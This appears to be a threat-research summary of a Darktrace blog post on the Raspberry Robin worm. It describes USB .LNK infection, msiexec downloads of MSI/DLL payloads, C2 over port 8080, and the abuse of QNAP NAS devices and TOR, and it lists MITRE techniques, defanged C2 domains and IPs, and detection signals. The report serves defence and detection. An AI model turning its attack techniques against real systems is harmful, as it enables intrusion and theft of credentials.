Threat Research

The Early Bird Catches the Worm: Darktrace’s Hunt for Raspberry Robin | Darktrace Blog

DarkTrace

Darktrace investigated Raspberry Robin, a USB-spread worm that uses malicious .LNK files, msiexec, and short-TLD C2 domains to download MSI packages containing DLLs that enable lateral movement, persistence, and data exfiltration. The campaign leverages compromised IoT devices (including QNAP NAS), TOR exit nodes, and one-day local privilege-escalation exploits to broaden access and deliver additional malware. #RaspberryRobin #QNAP

Keypoints

  • Initial access is commonly via infected USB drives containing malicious .LNK files that execute cmd.exe and msiexec to fetch the main payload.
  • Compromised hosts make HTTP GET requests (often on port 8080) with the user-agent “Windows Installer” to short, low-character C2 domains (e.g., .rocks, .pm, .wf) to download MSI packages.
  • Downloaded MSI packages drop protected malicious DLLs that enable payload download, lateral movement, persistence, privilege escalation, and device information exfiltration.
  • Operators use compromised IoT devices (notably QNAP NAS with hijacked DNS) and TOR exit nodes as C2 infrastructure backups, and have been observed using signed executables for DLL side-loading via messaging attachments (Discord).
  • Raspberry Robin has incorporated one-day local privilege-escalation exploits and advanced evasion (sandbox detection, mixed-case commands) to improve persistence and avoid signature-based detection.
  • Darktrace DETECT consistently identified anomalies (new user-agent, new IP, suspicious request data, uncommon TOR usage) across 2022 and 2023 investigations; RESPOND could autonomously block C2 connections and enforce a device’s normal pattern of life to contain infections.
  • The worm acts as an access broker, distributing additional payloads (e.g., FakeUpdates, Vidar-related binaries) and facilitating follow-on activity by other malware families and threat actors.

MITRE Techniques

  • [T1204.002] User Execution: Malicious Link – LNK shortcut on USB triggers execution: (‘When clicked, the LNK file automatically launches cmd.exe to execute the malicious file stored on the external drive’).
  • [T1218.011] Signed Binary Proxy Execution: Msiexec – msiexec is used to retrieve payloads from C2: (‘msiexec.exe to connect to a Raspberry Robin command-and-control (C2) endpoint and download the main malware component’).
  • [T1071.001] Application Layer Protocol: Web Protocols (HTTP) – C2 communications use HTTP GET over port 8080: (‘making HTTP GET connections via the unusual port 8080 to Raspberry Robin C2 endpoints using the new user agent “Windows Installer”‘).
  • [T1571] Non-Standard Port – Use of port 8080 instead of standard port 80 for C2 traffic: (‘unusual port 8080 for the HTTP protocol’).
  • [T1574.001] Hijack Execution Flow: DLL Side-Loading – Attackers deliver a signed executable with a malicious DLL for side-loading via Discord attachments: (‘a legitimate and signed Windows executable… alongside a malicious dynamic-link library (DLL) containing a Raspberry Robin sample’).
  • [T1090.003] Proxy: TOR – TOR exit nodes employed as backup C2 infrastructure: (‘utilizing TOR exit notes as backup C2 infrastructure, with compromised devices detected connecting to TOR endpoints’).
  • [T1068] Exploitation for Privilege Escalation – Operators leverage recently disclosed local privilege-escalation exploits to increase persistence and movement: (‘utilizes several local privilege escalation exploits that had been recently disclosed’).
  • [T1210] Exploitation of Remote Services (Lateral Movement) – The DLL enables lateral movement and exploitation of services across the network to propagate payloads: (‘download further payloads and enable lateral movement, persistence and privilege escalation on compromised devices’).
  • [T1041] Exfiltration Over C2 Channel – Compromised devices send host and credential data to C2: (‘making C2 connections that contained sensitive device information, including hostnames and credentials’).
  • [T1001] Data Obfuscation – The malware uses deception (fake payloads in sandboxes, mixed-case commands) to hinder analysis and evade signatures: (‘dropping a fake payload when analyzed in a sandboxed environment and using mixed-case executing commands’).

Indicators of Compromise

  • [Hostname / C2] observed C2 domains – vqdn[.]net, wak[.]rocks, and many others (e.g., m0[.]yt, o7car[.]com).
  • [IP address] likely C2 hosts – 59.15.11[.]49, 82.124.243[.]57 (additional listed IPs include 114.32.120[.]11 and 203.186.28[.]189).
  • [User-Agent] C2 fingerprint – “Windows Installer” used in HTTP GET requests to C2 endpoints.
  • [File / Payload] downloaded artifacts – MSI package (example observed from wak[.]rocks) that contained a protected malicious DLL; also numeric .exe drop associated with Vidar-like payloads.
  • [Infrastructure] compromised IoT devices abused as C2 – QNAP NAS devices (hijacked DNS) and other IoT devices (e.g., Cerio access point) used to host or proxy C2 activity.

This rewrite focuses on the technical procedure used by Raspberry Robin and omits non-technical background.

Raspberry Robin commonly gains initial access through infected removable media: an attached USB contains a malicious .LNK shortcut that launches cmd.exe to execute a payload on the drive, then uses msiexec to contact a C2 and download an MSI package. Compromised hosts perform HTTP GET requests—often on port 8080—with the user-agent string “Windows Installer” to short, low-character hostnames on TLDs like .rocks, .pm, and .wf; those MSI packages drop a protected malicious DLL responsible for fetching additional payloads and enabling lateral movement and persistence.

The DLL and follow-on components collect device metadata (hostnames, credentials), support privilege escalation via recently disclosed local exploits, and facilitate propagation across networks. Operators also abuse third-party infrastructure: compromised IoT devices such as QNAP NAS (with hijacked DNS) host payloads and act as C2; TOR exit nodes have been used as fallback C2 routes. Additional delivery techniques include side-loading via a signed executable paired with a malicious DLL distributed in archive attachments (observed via Discord).

Detection and containment hinge on early network-level anomalies: unusual msiexec outbound connections to rare endpoints, a new HTTP user-agent from internal devices, downloads of MSI packages from short, uncommon domains, and unexpected TOR connections. Darktrace flagged these via models for New User Agent, Suspicious Request Data, and Possible/Uncommon TOR Usage; with an autonomous response, blocking the C2 connection and enforcing the device’s learned “pattern of life” prevents the MSI/DLL download and stops lateral propagation.

Read more: https://darktrace.com/blog/the-early-bird-catches-the-worm-darktraces-hunt-for-raspberry-robin